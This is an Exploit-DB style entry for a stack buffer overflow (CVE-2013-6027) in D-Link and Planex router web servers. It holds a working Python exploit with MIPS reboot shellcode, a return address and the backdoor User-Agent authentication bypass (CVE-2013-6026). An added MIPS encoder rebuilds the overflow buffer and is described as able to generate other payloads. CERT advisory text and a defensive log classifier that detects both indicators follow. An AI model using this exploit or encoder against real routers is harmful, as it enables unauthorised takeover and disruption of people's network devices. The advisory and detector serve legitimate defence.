source: http://www.securityfocus.com/bid/63234/info
Routers from multiple vendors are prone to a stack-based buffer-overflow vulnerability in the RuntimeDiagnosticPing() function of the embedded web server, /bin/webs, reached through an over-long set/runtime/diagnostic/pingIp value passed to Tools/tools_misc.xgi.
Exploiting this vulnerability allows attackers to execute arbitrary code in the context of the web server on the affected device. The page is normally admin-only, but the exploit below bypasses authentication with the backdoor User-Agent string (CVE-2013-6026), so no credentials are required.
The following are vulnerable:
D-Link DIR-120
D-Link DI-624S
D-Link DI-524UP
D-Link DI-604S
D-Link DI-604UP
D-Link DI-604
D-Link DIR-100
D-Link TM-G5240
PLANEX COMMUNICATIONS BRL-04UR
PLANEX COMMUNICATIONS BRL-04R
PLANEX COMMUNICATIONS BRL-04CW
# Python 2 script (urllib2, print statement); the overflowing value is
# appended to the pingIp parameter of this URL further down.
import sys
import urllib2

try:
    url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
    print str(e)
    print 'Usage: %s <target ip>' % sys.argv[0]
    sys.exit(1)
# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload = "\x3c\x06\x43\x21" # lui a2,0x4321
payload += "\x34\xc6\xfe\xdc" # ori a2,a2,0xfedc
payload += "\x3c\x05\x28\x12" # lui a1,0x2812
payload += "\x34\xa5\x19\x69" # ori a1,a1,0x1969
payload += "\x3c\x04\xfe\xe1" # lui a0,0xfee1
payload += "\x34\x84\xde\xad" # ori a0,a0,0xdead
payload += "\x24\x02\x0f\xf8" # li v0,4088
payload += "\x01\x01\x01\x0c" # syscall 0x40404
# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
jump_code = "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08" # jr $t9
jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102 (branch-delay-slot filler: writes $zero, so it is a NOP with no NUL bytes)
# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
# The saved return address sits 86 bytes into the pingIp value, so pad
# shellcode_p1 up to that offset (or spill the rest of the payload past it).
if len(shellcode_p1) < 86:
    shellcode_p1 += "D" * (86 - len(shellcode_p1))
    shellcode_p2 = ""
else:
    shellcode_p2 = "DD" + payload[68:]
# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2
# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
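The exploit above hand-assembles its MIPS instructions as byte strings. The following is an added example, not part of Craig Heffner's exploit: a small MIPS32 big-endian encoder that re-derives every hand-assembled word in the exploit, rebuilds the overflow buffer with the same layout, and checks two properties a practitioner wants to confirm before sending anything: that the return address lands at the expected offset, and that the buffer contains no NUL byte. Register numbers, instruction choice, the 86-byte offset of the saved return address and the libc base/gadget offset come from the exploit; the NUL-free requirement is an assumption (the pingIp value is presumably copied as a C string, so a 0x00 byte would truncate the payload), which is also the reason the exploit's jr and syscall words carry non-zero junk in their unused fields.

```python
"""
Added example, not part of Craig Heffner's exploit: a minimal MIPS32
big-endian instruction encoder used to re-derive the hand-assembled bytes in
the exploit and to sanity-check the overflow buffer it builds. Register
numbers, the 86-byte return-address offset and the libc base/gadget offset
come from the exploit; the NUL-free requirement is an assumption.
"""
import struct

# MIPS o32 register numbers used by the exploit
ZERO, V0, A0, A1, A2, T9, SP, FP, RA = 0, 2, 4, 5, 6, 25, 29, 30, 31

# From the exploit: DIR-100 rev A firmware v1.13 libc base and gadget offset
LIBC_BASE = 0x2AAEE000
GADGET_OFF = 0x3243C
RET_OFFSET = 86          # bytes of shellcode_p1 before the saved $ra


def _word(w):
    """Pack one 32-bit instruction big-endian (the target is big-endian MIPS)."""
    return struct.pack(">I", w & 0xFFFFFFFF)


def lui(rt, imm16):
    return _word((0x0F << 26) | (rt << 16) | (imm16 & 0xFFFF))


def ori(rt, rs, imm16):
    return _word((0x0D << 26) | (rs << 21) | (rt << 16) | (imm16 & 0xFFFF))


def addiu(rt, rs, imm16):
    # the CPU sign-extends the 16-bit field, so a negative offset just keeps its low 16 bits
    return _word((0x09 << 26) | (rs << 21) | (rt << 16) | (imm16 & 0xFFFF))


def addu(rd, rs, rt):
    return _word((rs << 21) | (rt << 16) | (rd << 11) | 0x21)


def jr(rs, rt=0, rd=0):
    """jr rs. The rt/rd fields are ignored by the CPU; the exploit fills them
    with non-zero junk so the encoded word contains no 0x00 byte."""
    return _word((rs << 21) | (rt << 16) | (rd << 11) | 0x08)


def syscall(code=0):
    """syscall. The 20-bit code field is ignored by Linux; the exploit uses
    0x40404 for the same NUL-avoidance reason."""
    return _word(((code & 0xFFFFF) << 6) | 0x0C)


def li32(reg, value):
    """Load a 32-bit constant with the usual lui/ori pair."""
    return lui(reg, value >> 16) + ori(reg, reg, value & 0xFFFF)


def reboot_payload():
    """reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART)
    through o32 syscall 4088, in the same order as the exploit's payload."""
    return (li32(A2, 0x4321FEDC)
            + li32(A1, 0x28121969)
            + li32(A0, 0xFEE1DEAD)
            + addiu(V0, ZERO, 4088)          # li v0,4088
            + syscall(0x40404))


def build_buffer(payload, ret_addr=LIBC_BASE + GADGET_OFF):
    """Reproduce the exploit's layout:
    [move fp,sp][payload[:68]][addiu t9,fp,724; jr t9; delay slot]["DD"][pad to 86][ret][rest]"""
    jump_code = addiu(T9, FP, 724) + jr(T9, rt=1, rd=31) + addiu(ZERO, RA, -0x102)
    p1 = addu(FP, SP, ZERO) + payload[:68] + jump_code + b"DD"
    if len(p1) < RET_OFFSET:
        p1 += b"D" * (RET_OFFSET - len(p1))
        p2 = b""
    else:
        p2 = b"DD" + payload[68:]
    return p1 + struct.pack(">I", ret_addr) + p2


def nul_free(buf):
    """True if the buffer would survive a C-string copy intact."""
    return b"\x00" not in buf


def ret_offset(buf, ret_addr=LIBC_BASE + GADGET_OFF):
    """Offset at which the return address sits in the buffer (-1 if absent)."""
    return buf.find(struct.pack(">I", ret_addr))


if __name__ == "__main__":
    buf = build_buffer(reboot_payload())
    print(buf.hex())
    print("length %d, $ra overwritten at offset %d, NUL-free: %s"
          % (len(buf), ret_offset(buf), nul_free(buf)))
```

Running the block prints the 90-byte buffer with the return address 0x2AB2043C at offset 86. The canonical encoding of jr $t9 (0x03200008) fails the nul_free() check, which is why the exploit's word is 0x0321F808 instead; the same encoder can be used to generate a different payload for the 68-byte-then-spill layout, as long as it leaves $fp and $t9 alone.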
Exploit-DB entry metadata

  EDB-ID:     38810 (https://www.exploit-db.com/exploits/38810/)
  Title:      Multiple Vendors 'RuntimeDiagnosticPing()' Stack Buffer Overflow Vulnerability
  Type:       remote exploit, hardware platform
  CVE:        CVE-2013-6027
  OSVDB:      98805
  Published:  2013-10-14
  Reporter:   Craig Heffner
  CVSS v2:    8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
  Related:    CVE-2013-6027 (NVD), THN:CF0D23B54ED7409626F66267A705513B, CERT VU#248083

CVE-2013-6027 (NVD; published 2013-10-19, modified 2013-10-21)

  Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.
  CWE-119. CVSS v2 8.5 HIGH (AV:N/AC:M/Au:S/C:C/I:C/A:C; exploitability 6.8, impact 10.0). CPE: cpe:/h:d-link:dir-100:-
  https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6027

The Hacker News, 2013-12-02: "D-Link Releases Router Firmware Updates for backdoor vulnerability"
  http://thehackernews.com/2013/12/d-link-releases-router-firmware-updates.html

CERT Vulnerability Note VU#248083: D-Link routers authenticate administrative access using specific User-Agent string
  https://www.kb.cert.org/vuls/id/248083 (aggregator CVSS: 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C)

  Overview
  Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected.

  Description
  CVE-2013-6026: According to security researcher Craig Heffner, the firmware for various D-Link routers contains a backdoor that allows unauthenticated remote users to bypass the routers' password authentication mechanism. A router's internal web server will accept and process any HTTP requests that contain the User-Agent string "xmlset_roodkcableoj28840ybtide" without checking if the connecting host is authenticated.
  D-Link has confirmed that the affected D-Link routers disable web configuration from the WAN by default.
  According to D-Link, the following D-Link routers are affected:
    * DIR-100
    * DIR-120
    * DI-624S
    * DI-524UP
    * DI-604S
    * DI-604UP
    * DI-604+
    * TM-G5240
  According to the original vulnerability report (http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/), the following Planex routers are likely affected:
    * BRL-04R
    * BRL-04UR
    * BRL-04CW
  It appears that Alpha Networks may be the OEM for routers branded by D-Link and Planex (and probably other vendors). It is not clear where in the supply chain the backdoor was added, so routers from any of these vendors may be affected.
  CVE-2013-6027: A separate stack overflow vulnerability in the management web server has also been reported (http://pastebin.com/vbiG42VD).

  Impact
  An unauthenticated remote attacker can take any action as an administrator using the remote management web server.

  Solution
  D-Link is maintaining a page (http://www.dlink.com/be/fr/support/security) to inform users of this issue and provide updates as patches are released.

  Restrict Access
  Restrict access to the administrative web server by disabling remote management features or by blocking HTTP requests on the external WAN interface. The administrative web server may listen on ports 80/tcp or 8080/tcp.
  D-Link has confirmed that the affected D-Link routers disable web configuration from the WAN by default. There is some evidence (http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html) that at least one ISP may have deployed vulnerable routers with the remote WAN management enabled.

  Vendor Information
    D-Link Systems, Inc.:     Affected (notified October 16, 2013; updated October 17, 2013). No vendor statement received.
    Alpha Networks Inc:       Unknown (updated October 17, 2013). No vendor statement received.
    Planex Communications Inc: Unknown (updated October 17, 2013). No vendor statement received.

  CVSS Metrics (as scored by CERT)
    Group         | Score | Vector
    --------------|-------|------------------------------------
    Base          | 8.3   | AV:A/AC:L/Au:N/C:C/I:C/A:C
    Temporal      | 7.5   | E:F/RL:W/RC:C
    Environmental | 5.6   | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND

  References
    * http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
    * http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/
    * http://www.dlink.com/uk/en/support/security
    * http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html
    * http://pastebin.com/vbiG42VD

  Acknowledgements
  Thanks to Craig Heffner of /DEV/TTYS0 for reporting this vulnerability. This document was written by Todd Lewellen.

  Other Information
    CVE IDs:              CVE-2013-6026 (http://web.nvd.nist.gov/vuln/detail/CVE-2013-6026), CVE-2013-6027 (http://web.nvd.nist.gov/vuln/detail/CVE-2013-6027)
    Date Public:          2013-10-12
    Date First Published: 2013-10-17
    Date Last Updated:    2014-07-29 23:29 UTC
    Document Revision:    34
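Beyond restricting WAN access, a defender who has HTTP logs from in front of these devices (a reverse proxy, an IDS capture, or an ISP-side gateway) can look for both indicators this page documents. The following is an added example, not from the advisory, CERT or the exploit author: a classifier that runs over access-log lines in combined log format and flags the backdoor User-Agent (CVE-2013-6026) and an over-long set/runtime/diagnostic/pingIp value sent to tools_misc.xgi (CVE-2013-6027). The log lines are constructed for the example; the 86-byte threshold is taken from the exploit's layout (the saved return address is overwritten at that offset) and the handling of \xNN escapes assumes the log writer escapes raw bytes that way, as Apache-style loggers do.

```python
"""
Added example (not part of the advisory or the exploit): flag HTTP requests
that match the two indicators on this page. Log lines are constructed; the
86-byte threshold comes from the exploit's buffer layout.
"""
import re
from urllib.parse import urlsplit, unquote, unquote_to_bytes

BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"   # CVE-2013-6026 auth-bypass User-Agent
PING_PARAM = "set/runtime/diagnostic/pingIp"     # CVE-2013-6027 overflowing parameter
RET_OFFSET = 86  # from the exploit: the saved $ra is overwritten 86 bytes into the value

# Combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
_LOG_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')   # how the log writer escapes raw bytes (assumed)


def logged_value_bytes(value):
    """Recover the bytes the server saw from a logged query value: undo the
    log writer's \\xNN escaping first, then the client's percent-encoding."""
    raw = _LOG_ESC.sub(lambda m: chr(int(m.group(1), 16)), value).encode("latin-1", "replace")
    return unquote_to_bytes(raw)


def classify(line):
    """Return the indicator names matching one access-log line ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    if m.group("ua") == BACKDOOR_UA:
        findings.append("backdoor-user-agent")
    parts = urlsplit(m.group("target"))
    if parts.path.endswith("/tools_misc.xgi"):
        for pair in parts.query.split("&"):
            key, _, value = pair.partition("=")
            if unquote(key) == PING_PARAM and len(logged_value_bytes(value)) >= RET_OFFSET:
                findings.append("pingip-overflow")
                break
    return findings


def scan(lines):
    """Run classify() over many lines; return (client ip, findings) for hits only."""
    hits = []
    for line in lines:
        found = classify(line)
        if found:
            hits.append((LOG_RE.match(line).group("ip"), found))
    return hits


# Constructed sample log: a benign ping, a backdoor-UA request with a normal
# value, an overflow delivered with the backdoor UA (raw bytes escaped by the
# logger), and a percent-encoded overflow sent with a normal browser UA.
_PREFIX = ('10.0.0.5 - - [14/Oct/2013:10:00:00 +0000] '
           '"GET /Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=')
_SUFFIX = ' HTTP/1.1" 200 512 "-" "'
SAMPLE_LOG = [
    _PREFIX + '192.168.0.1' + _SUFFIX + 'Mozilla/5.0"',
    _PREFIX + '8.8.8.8' + _SUFFIX + BACKDOOR_UA + '"',
    _PREFIX + '\\xff' * 90 + _SUFFIX + BACKDOOR_UA + '"',
    _PREFIX + '%41' * 90 + _SUFFIX + 'Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found))
```

The value length is measured after decoding, so a percent-encoded or logger-escaped payload is not hidden by its longer on-disk form. The backdoor User-Agent match is the higher-confidence signal: no legitimate client sends it, whereas a legitimate pingIp value is an address or hostname and never approaches 86 bytes, so the length threshold can be lowered considerably without false positives.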